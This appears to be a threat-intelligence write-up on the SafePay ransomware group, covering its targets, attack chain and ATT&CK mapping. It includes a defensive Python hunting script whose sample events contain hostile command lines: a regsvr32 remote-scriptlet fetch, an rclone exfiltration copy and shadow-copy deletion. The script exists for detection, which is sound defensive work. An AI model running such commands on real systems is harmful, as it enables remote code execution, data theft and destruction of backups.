
SafePay Ransomware Targets 260+ Victims Across Various Countries


A sophisticated ransomware group known as SafePay has emerged as one of the most aggressive threat actors in the cybersecurity landscape, claiming responsibility for over 265 victims across multiple countries since its initial appearance in September 2024.

Unlike ransomware-as-a-service operations that recruit affiliates, SafePay is a closed group that develops and deploys its ransomware itself. It practises double extortion: files are encrypted, and data stolen beforehand is held over the victim with the threat of publication on its leak site.

SafePay Ransomware’s data leak site (DLS)

US and Germany Bear Brunt of Attacks

SafePay’s targeting strategy reveals a clear focus on developed economies, with the United States suffering the heaviest impact at 103 confirmed victims, nearly 40% of all known cases.

Germany follows as the second most targeted nation with 47 cases, while attacks have spread across the United Kingdom, Australia, Canada, and various countries in Latin America and Asia.

The ransomware avoids targets in the CIS region by design: a built-in language check terminates the malware if the system language is Russian, Ukrainian, Armenian, Belarusian, Georgian, Kazakh, or Azerbaijani. This exclusion is common in ransomware operated out of CIS countries and says more about the operators' origin than about their targeting; it should not be treated as a defence.

The group’s victim profile spans diverse industries, with manufacturing, technology, education, business services, and healthcare sectors bearing the brunt of attacks.

This broad targeting approach indicates SafePay’s strategy of focusing on organizations likely to pay ransoms to avoid operational disruption.

Sophisticated Multi-Vector Attack Chain

SafePay's intrusions begin with stolen credentials, bought on dark web markets or harvested by infostealer infections, which the group then uses to log in to exposed VPN gateways and RDP endpoints.

Simplified Cyber Kill Chain diagram of SafePay Ransomware

In multiple incidents the group got past multi-factor authentication, helped by misconfigured firewalls that left remote-access services reachable and by weak password policies.

The group also runs social engineering campaigns that combine email flooding (bombarding a target's inbox with junk) with vishing calls in which the attackers pose as IT support and talk the target into running a malicious payload.

Once inside networks, SafePay establishes persistence using legitimate remote access tools like ConnectWise ScreenConnect and custom malware such as QDoor.

The group employs living-off-the-land techniques, utilizing built-in Windows tools like regsvr32 and cmd.exe to execute code while evading detection.

Before encryption, the attackers spend days exfiltrating data with FileZilla and Rclone, moving hundreds of gigabytes to attacker-controlled servers to use as extortion leverage.

The ransomware appends the .safepay extension to encrypted files and drops ransom notes named readme_safepay.txt, which direct victims to negotiation portals hosted on The Open Network (TON).
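The post-access tooling and the encryption artefacts described in this section map directly onto hunting logic. What follows is an added example, not SafePay's code and not any vendor's detection content: it runs a small set of rules over constructed, Sysmon-shaped process-creation (EventID 1) and file-creation (EventID 11) records, flagging regsvr32 loading a remote scriptlet, a ScreenConnect client installed outside the sanctioned path, Rclone and FileZilla on a file server, shadow-copy deletion, and files written with the .safepay extension or named readme_safepay.txt. The host names, file paths, relay host, the 203.0.113.10 address and the sp.exe binary name are invented, and the sanctioned ScreenConnect install prefix is an assumption to be replaced with your own.

```python
import re
from collections import Counter, defaultdict

ENCRYPTED_EXT = ".safepay"          # appended to every encrypted file
RANSOM_NOTE = "readme_safepay.txt"  # note dropped alongside encrypted files

# Where a sanctioned ScreenConnect client would live. Assumption for this
# example; replace with the install prefix your own deployment uses.
SANCTIONED_SCREENCONNECT = r"c:\program files (x86)\screenconnect client"

# Constructed, Sysmon-shaped telemetry (EventID 1 = ProcessCreate,
# EventID 11 = FileCreate). Hosts, paths, addresses and sp.exe are invented.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "FS01", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://203.0.113.10/a.sct scrobj.dll"},
    {"EventID": 1, "Computer": "FS01",
     "Image": r"C:\ProgramData\sc\ScreenConnect.ClientService.exe",
     "CommandLine": 'ScreenConnect.ClientService.exe "?e=Access&y=Guest&h=relay.example.net&p=8041"'},
    {"EventID": 1, "Computer": "FS01", "Image": r"C:\Users\svc_backup\rclone.exe",
     "CommandLine": r"rclone.exe copy D:\Shares\Finance remote:dump --transfers 32 -q"},
    {"EventID": 1, "Computer": "FS01",
     "Image": r"C:\Users\svc_backup\Desktop\FileZilla\filezilla.exe",
     "CommandLine": "filezilla.exe"},
    {"EventID": 1, "Computer": "FS01", "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    # Benign: a vendor installer registering a local DLL. Must not be flagged.
    {"EventID": 1, "Computer": "WS17", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll"},
    {"EventID": 11, "Computer": "FS01", "Image": r"C:\Users\Public\sp.exe",
     "TargetFilename": r"D:\Shares\Finance\Q3\ledger.xlsx.safepay"},
    {"EventID": 11, "Computer": "FS01", "Image": r"C:\Users\Public\sp.exe",
     "TargetFilename": r"D:\Shares\Finance\Q3\readme_safepay.txt"},
    {"EventID": 11, "Computer": "WS17", "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\alice\Documents\notes.txt"},
]

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def _is_regsvr32_remote(ev):
    # Proxy execution via regsvr32 fetching a scriptlet over HTTP. A plain
    # local "/s file.dll" registration (the WS17 event) is left alone.
    return (_basename(ev["Image"]) == "regsvr32.exe"
            and re.search(r"/i:\s*https?://", ev["CommandLine"], re.I) is not None)

def _is_rogue_screenconnect(ev):
    return ("screenconnect" in _basename(ev["Image"])
            and not ev["Image"].lower().startswith(SANCTIONED_SCREENCONNECT))

def _is_rclone_transfer(ev):
    # Any rclone copy/sync/move invocation, wherever the binary was dropped.
    return re.search(r'rclone(\.exe)?"?\s+(copy|copyto|sync|move)\b',
                     ev["CommandLine"], re.I) is not None

def _is_filezilla(ev):
    return _basename(ev["Image"]) in ("filezilla.exe", "fzsftp.exe")

def _is_shadow_deletion(ev):
    cmd, img = ev["CommandLine"].lower(), _basename(ev["Image"])
    return ((img == "vssadmin.exe" and "delete shadows" in cmd)
            or (img == "wmic.exe" and "shadowcopy delete" in cmd))

# (rule name, ATT&CK technique, predicate) applied to ProcessCreate events.
PROCESS_RULES = [
    ("regsvr32 loading a remote scriptlet", "T1218.010", _is_regsvr32_remote),
    ("ScreenConnect client outside sanctioned path", "T1219", _is_rogue_screenconnect),
    ("Rclone copy/sync to a remote", "T1048", _is_rclone_transfer),
    ("FileZilla launched on a server", "T1048.003", _is_filezilla),
    ("shadow copy deletion", "T1490", _is_shadow_deletion),
]

def hunt(events):
    """Return one finding per matching event: host, rule, technique, evidence."""
    findings = []
    for ev in events:
        host = ev.get("Computer", "?")
        if ev.get("EventID") == 1:
            for name, technique, pred in PROCESS_RULES:
                if pred(ev):
                    findings.append({"host": host, "rule": name, "technique": technique,
                                     "evidence": ev["CommandLine"]})
        elif ev.get("EventID") == 11:
            target = ev.get("TargetFilename", "")
            base = _basename(target)
            if base == RANSOM_NOTE:
                findings.append({"host": host, "rule": "ransom note written",
                                 "technique": "T1486", "evidence": target})
            elif base.endswith(ENCRYPTED_EXT):
                findings.append({"host": host, "rule": "encrypted file written",
                                 "technique": "T1486", "evidence": target})
    return findings

def impact_summary(findings):
    """Per-host counts of encryption artefacts, to scope the blast radius quickly."""
    per_host = defaultdict(Counter)
    for f in findings:
        if f["technique"] == "T1486":
            per_host[f["host"]][f["rule"]] += 1
    return {host: dict(counts) for host, counts in per_host.items()}

if __name__ == "__main__":
    results = hunt(SAMPLE_EVENTS)
    for f in results:
        print(f"{f['host']:5} {f['technique']:10} {f['rule']:44} {f['evidence']}")
    print(impact_summary(results))
```

The credential-based VPN and RDP logons at the start of the chain are an authentication-log problem and are deliberately outside these rules. Before alerting on them, baseline the Rclone, FileZilla and ScreenConnect rules against your estate: backup hosts and help-desk workstations will run all three legitimately, and the value of the rules is in where and by whom the tools are run, not their mere presence.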

Indicators of Compromise (IoCs):

MITRE ATT&CK

Tactic                Technique ID   Technique Name
Initial Access        T1078          Valid Accounts
Execution             T1059          Command and Scripting Interpreter
                      T1059.001      PowerShell
                      T1059.003      Windows Command Shell
Privilege Escalation  T1548.002      Abuse Elevation Control Mechanism: Bypass User Account Control
Defense Evasion       T1218          System Binary Proxy Execution
                      T1070.004      Indicator Removal: File Deletion
                      T1562.001      Impair Defenses: Disable or Modify Tools
Credential Access     T1003          OS Credential Dumping
Discovery             T1135          Network Share Discovery
                      T1482          Domain Trust Discovery
Lateral Movement      T1021          Remote Services
Collection            T1560.001      Archive Collected Data: Archive via Utility
Exfiltration          T1048          Exfiltration Over Alternative Protocol
                      T1048.003      Exfiltration Over Unencrypted Non-C2 Protocol
Impact                T1486          Data Encrypted for Impact
                      T1490          Inhibit System Recovery
